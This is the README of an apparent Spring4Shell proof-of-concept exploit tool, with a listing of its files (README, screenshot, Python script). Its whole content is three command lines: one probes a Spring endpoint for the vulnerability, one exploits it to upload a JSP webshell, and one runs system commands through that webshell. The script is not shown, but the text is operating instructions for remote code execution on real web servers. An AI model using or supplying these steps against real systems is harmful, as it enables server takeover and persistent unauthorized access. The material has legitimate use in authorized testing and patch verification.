Simple Spring4Shell POC
-----------------------
* Check if endpoint is vulnerable
`python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting --check`
* Exploit vulnerable endpoint
`python spring4shell.py -u http://192.168.110.117:8080/helloworld/greeting -f shell.jsp --exploit`
* Execute command on uploaded webshell
`python spring4shell.py -u http://192.168.110.117:8080/shell.jsp --cmd id`

[4.0K] /data/pocs/46aab9fe4d623ddbe6f7c43550bf6c51526c529b
├── [ 474] README.md
├── [ 11K] spring4shell.png
└── [4.7K] spring4shell.py
0 directories, 3 files